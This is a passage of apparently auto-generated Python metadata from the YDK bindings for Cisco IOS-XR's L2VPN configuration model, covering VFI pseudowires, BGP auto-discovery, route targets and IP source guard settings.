'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.VfiPseudowires.VfiPseudowire.PseudowireStaticMacAddresses' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.VfiPseudowires.VfiPseudowire.PseudowireStaticMacAddresses',
False,
[
_MetaInfoClassMember('pseudowire-static-mac-address', REFERENCE_LIST, 'PseudowireStaticMacAddress' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.VfiPseudowires.VfiPseudowire.PseudowireStaticMacAddresses.PseudowireStaticMacAddress',
[], [],
''' Static Mac Address Configuration
''',
'pseudowire_static_mac_address',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'pseudowire-static-mac-addresses',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.VfiPseudowires.VfiPseudowire' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.VfiPseudowires.VfiPseudowire',
False,
[
_MetaInfoClassMember('neighbor', ATTRIBUTE, 'str' , None, None,
[], ['(([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])\\.){3}([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])(%[\\p{N}\\p{L}]+)?'],
''' Neighbor IP address
''',
'neighbor',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('pseudowire-id', ATTRIBUTE, 'int' , None, None,
[('1', '4294967295')], [],
''' Pseudowire ID
''',
'pseudowire_id',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('pseudowire-static-mac-addresses', REFERENCE_CLASS, 'PseudowireStaticMacAddresses' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.VfiPseudowires.VfiPseudowire.PseudowireStaticMacAddresses',
[], [],
''' Static Mac Address Table
''',
'pseudowire_static_mac_addresses',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('vfi-pw-class', ATTRIBUTE, 'str' , None, None,
[(0, 32)], [],
''' PW class template name to use for this
pseudowire
''',
'vfi_pw_class',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('vfi-pw-dhcp-snoop', REFERENCE_CLASS, 'VfiPwDhcpSnoop' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.VfiPseudowires.VfiPseudowire.VfiPwDhcpSnoop',
[], [],
''' Attach a DHCP Snooping profile
''',
'vfi_pw_dhcp_snoop',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('vfi-pw-igmp-snoop', ATTRIBUTE, 'str' , None, None,
[(0, 32)], [],
''' Attach a IGMP Snooping profile
''',
'vfi_pw_igmp_snoop',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('vfi-pw-mld-snoop', ATTRIBUTE, 'str' , None, None,
[(0, 32)], [],
''' Attach a MLD Snooping profile
''',
'vfi_pw_mld_snoop',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('vfi-pw-mpls-static-labels', REFERENCE_CLASS, 'VfiPwMplsStaticLabels' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.VfiPseudowires.VfiPseudowire.VfiPwMplsStaticLabels',
[], [],
''' MPLS static labels
''',
'vfi_pw_mpls_static_labels',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'vfi-pseudowire',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.VfiPseudowires' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.VfiPseudowires',
False,
[
_MetaInfoClassMember('vfi-pseudowire', REFERENCE_LIST, 'VfiPseudowire' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.VfiPseudowires.VfiPseudowire',
[], [],
''' Pseudowire configuration
''',
'vfi_pseudowire',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'vfi-pseudowires',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.BgpAutoDiscovery.LdpSignalingProtocol.Vplsid' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.BgpAutoDiscovery.LdpSignalingProtocol.Vplsid',
False,
[
_MetaInfoClassMember('address', ATTRIBUTE, 'str' , None, None,
[], ['(([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])\\.){3}([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])(%[\\p{N}\\p{L}]+)?'],
''' IPV4 address
''',
'address',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('address-index', ATTRIBUTE, 'int' , None, None,
[('0', '32767')], [],
''' Address index
''',
'address_index',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('as', ATTRIBUTE, 'int' , None, None,
[('1', '65535')], [],
''' Two byte AS number
''',
'as_',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('as-index', ATTRIBUTE, 'int' , None, None,
[('0', '4294967295')], [],
''' AS index
''',
'as_index',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('type', REFERENCE_ENUM_CLASS, 'LdpVplsIdEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'LdpVplsIdEnum',
[], [],
''' VPLS-ID Type
''',
'type',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'vplsid',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.BgpAutoDiscovery.LdpSignalingProtocol.FlowLabelLoadBalance' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.BgpAutoDiscovery.LdpSignalingProtocol.FlowLabelLoadBalance',
False,
[
_MetaInfoClassMember('flow-label', REFERENCE_ENUM_CLASS, 'FlowLabelLoadBalanceEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'FlowLabelLoadBalanceEnum',
[], [],
''' Flow Label load balance type
''',
'flow_label',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('static', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Static Flow Label
''',
'static',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'flow-label-load-balance',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.BgpAutoDiscovery.LdpSignalingProtocol' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.BgpAutoDiscovery.LdpSignalingProtocol',
False,
[
_MetaInfoClassMember('enable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable LDP as Signaling Protocol
.Deletion of this object also causes
deletion of all objects under
LDPSignalingProtocol.
''',
'enable',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('flow-label-load-balance', REFERENCE_CLASS, 'FlowLabelLoadBalance' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.BgpAutoDiscovery.LdpSignalingProtocol.FlowLabelLoadBalance',
[], [],
''' Enable Flow Label based load balancing
''',
'flow_label_load_balance',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('vplsid', REFERENCE_CLASS, 'Vplsid' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.BgpAutoDiscovery.LdpSignalingProtocol.Vplsid',
[], [],
''' VPLS ID
''',
'vplsid',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'ldp-signaling-protocol',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.BgpAutoDiscovery.BgpRoutePolicy' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.BgpAutoDiscovery.BgpRoutePolicy',
False,
[
_MetaInfoClassMember('export', ATTRIBUTE, 'str' , None, None,
[], [],
''' Export route policy
''',
'export',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'bgp-route-policy',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.BgpAutoDiscovery.RouteDistinguisher' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.BgpAutoDiscovery.RouteDistinguisher',
False,
[
_MetaInfoClassMember('addr-index', ATTRIBUTE, 'int' , None, None,
[('0', '65535')], [],
''' Addr index
''',
'addr_index',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('address', ATTRIBUTE, 'str' , None, None,
[], ['(([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])\\.){3}([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])(%[\\p{N}\\p{L}]+)?'],
''' IPV4 address
''',
'address',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('as', ATTRIBUTE, 'int' , None, None,
[('1', '4294967295')], [],
''' Two byte or 4 byte AS number
''',
'as_',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('as-index', ATTRIBUTE, 'int' , None, None,
[('0', '4294967295')], [],
''' AS:nn (hex or decimal format)
''',
'as_index',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('type', REFERENCE_ENUM_CLASS, 'BgpRouteDistinguisherEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'BgpRouteDistinguisherEnum',
[], [],
''' Router Distinguisher Type
''',
'type',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'route-distinguisher',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.BgpAutoDiscovery.BgpSignalingProtocol.FlowLabelLoadBalance' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.BgpAutoDiscovery.BgpSignalingProtocol.FlowLabelLoadBalance',
False,
[
_MetaInfoClassMember('flow-label', REFERENCE_ENUM_CLASS, 'FlowLabelLoadBalanceEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'FlowLabelLoadBalanceEnum',
[], [],
''' Flow Label load balance type
''',
'flow_label',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('static', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Static Flow Label
''',
'static',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'flow-label-load-balance',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.BgpAutoDiscovery.BgpSignalingProtocol' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.BgpAutoDiscovery.BgpSignalingProtocol',
False,
[
_MetaInfoClassMember('enable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable BGP as Signaling Protocol
''',
'enable',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('flow-label-load-balance', REFERENCE_CLASS, 'FlowLabelLoadBalance' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.BgpAutoDiscovery.BgpSignalingProtocol.FlowLabelLoadBalance',
[], [],
''' Enable Flow Label based load balancing
''',
'flow_label_load_balance',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('ve-range', ATTRIBUTE, 'int' , None, None,
[('11', '100')], [],
''' Local Virtual Edge Block Configurable
Range
''',
've_range',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('veid', ATTRIBUTE, 'int' , None, None,
[('1', '16384')], [],
''' Local Virtual Edge Identifier
''',
'veid',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'bgp-signaling-protocol',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.BgpAutoDiscovery.RouteTargets.RouteTarget.TwoByteAsOrFourByteAs' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.BgpAutoDiscovery.RouteTargets.RouteTarget.TwoByteAsOrFourByteAs',
False,
[
_MetaInfoClassMember('as', ATTRIBUTE, 'int' , None, None,
[('1', '4294967295')], [],
''' Two byte or 4 byte AS number
''',
'as_',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('as-index', ATTRIBUTE, 'int' , None, None,
[('0', '4294967295')], [],
''' AS:nn (hex or decimal format)
''',
'as_index',
'Cisco-IOS-XR-l2vpn-cfg', True),
],
'Cisco-IOS-XR-l2vpn-cfg',
'two-byte-as-or-four-byte-as',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.BgpAutoDiscovery.RouteTargets.RouteTarget.Ipv4Address' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.BgpAutoDiscovery.RouteTargets.RouteTarget.Ipv4Address',
False,
[
_MetaInfoClassMember('addr-index', ATTRIBUTE, 'int' , None, None,
[('0', '65535')], [],
''' Addr index
''',
'addr_index',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('address', ATTRIBUTE, 'str' , None, None,
[], ['(([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])\\.){3}([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])(%[\\p{N}\\p{L}]+)?'],
''' IPV4 address
''',
'address',
'Cisco-IOS-XR-l2vpn-cfg', True),
],
'Cisco-IOS-XR-l2vpn-cfg',
'ipv4-address',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.BgpAutoDiscovery.RouteTargets.RouteTarget' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.BgpAutoDiscovery.RouteTargets.RouteTarget',
False,
[
_MetaInfoClassMember('format', REFERENCE_ENUM_CLASS, 'BgpRouteTargetFormatEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'BgpRouteTargetFormatEnum',
[], [],
''' Format of the route target
''',
'format',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('role', REFERENCE_ENUM_CLASS, 'BgpRouteTargetRoleEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'BgpRouteTargetRoleEnum',
[], [],
''' Role of the router target type
''',
'role',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('ipv4-address', REFERENCE_LIST, 'Ipv4Address' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.BgpAutoDiscovery.RouteTargets.RouteTarget.Ipv4Address',
[], [],
''' ipv4 address
''',
'ipv4_address',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('two-byte-as-or-four-byte-as', REFERENCE_LIST, 'TwoByteAsOrFourByteAs' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.BgpAutoDiscovery.RouteTargets.RouteTarget.TwoByteAsOrFourByteAs',
[], [],
''' two byte as or four byte as
''',
'two_byte_as_or_four_byte_as',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'route-target',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.BgpAutoDiscovery.RouteTargets' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.BgpAutoDiscovery.RouteTargets',
False,
[
_MetaInfoClassMember('route-target', REFERENCE_LIST, 'RouteTarget' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.BgpAutoDiscovery.RouteTargets.RouteTarget',
[], [],
''' Name of the Route Target
''',
'route_target',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'route-targets',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.BgpAutoDiscovery' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.BgpAutoDiscovery',
False,
[
_MetaInfoClassMember('ad-control-word', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable control-word for this VFI
''',
'ad_control_word',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('bgp-route-policy', REFERENCE_CLASS, 'BgpRoutePolicy' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.BgpAutoDiscovery.BgpRoutePolicy',
[], [],
''' Route policy
''',
'bgp_route_policy',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('bgp-signaling-protocol', REFERENCE_CLASS, 'BgpSignalingProtocol' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.BgpAutoDiscovery.BgpSignalingProtocol',
[], [],
''' Enable Signaling Protocol BGP in this
VFI
''',
'bgp_signaling_protocol',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('enable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable Autodiscovery BGP
''',
'enable',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('ldp-signaling-protocol', REFERENCE_CLASS, 'LdpSignalingProtocol' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.BgpAutoDiscovery.LdpSignalingProtocol',
[], [],
''' Signaling Protocol LDP in this VFI
configuration
''',
'ldp_signaling_protocol',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('route-distinguisher', REFERENCE_CLASS, 'RouteDistinguisher' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.BgpAutoDiscovery.RouteDistinguisher',
[], [],
''' Route Distinguisher
''',
'route_distinguisher',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('route-targets', REFERENCE_CLASS, 'RouteTargets' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.BgpAutoDiscovery.RouteTargets',
[], [],
''' Route Target
''',
'route_targets',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('table-policy', ATTRIBUTE, 'str' , None, None,
[], [],
''' Table Policy for installation of
forwarding data to L2FIB
''',
'table_policy',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'bgp-auto-discovery',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi',
False,
[
_MetaInfoClassMember('name', ATTRIBUTE, 'str' , None, None,
[(0, 32)], [],
''' Name of the Virtual Forwarding Interface
''',
'name',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('bgp-auto-discovery', REFERENCE_CLASS, 'BgpAutoDiscovery' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.BgpAutoDiscovery',
[], [],
''' Enable Autodiscovery BGP in this VFI
''',
'bgp_auto_discovery',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('multicast-p2mp', REFERENCE_CLASS, 'MulticastP2Mp' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.MulticastP2Mp',
[], [],
''' Enable Multicast P2MP in this VFI
''',
'multicast_p2mp',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('vfi-pseudowires', REFERENCE_CLASS, 'VfiPseudowires' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.VfiPseudowires',
[], [],
''' List of pseudowires
''',
'vfi_pseudowires',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('vfi-shutdown', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enabling Shutdown
''',
'vfi_shutdown',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('vpnid', ATTRIBUTE, 'int' , None, None,
[('1', '4294967295')], [],
''' VPN Identifier
''',
'vpnid',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'vfi',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis',
False,
[
_MetaInfoClassMember('vfi', REFERENCE_LIST, 'Vfi' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi',
[], [],
''' Name of the Virtual Forwarding Interface
''',
'vfi',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'vfis',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.InterfaceIpSourceGuard' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.InterfaceIpSourceGuard',
False,
[
_MetaInfoClassMember('disable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Disable L2 Interface Dynamic IP source
guard
''',
'disable',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('enable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable IP Source Guard
''',
'enable',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('logging', REFERENCE_ENUM_CLASS, 'L2VpnLoggingEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2VpnLoggingEnum',
[], [],
''' Logging Type
''',
'logging',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'interface-ip-source-guard',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.InterfaceDai.InterfaceDaiAddressValidation' : {
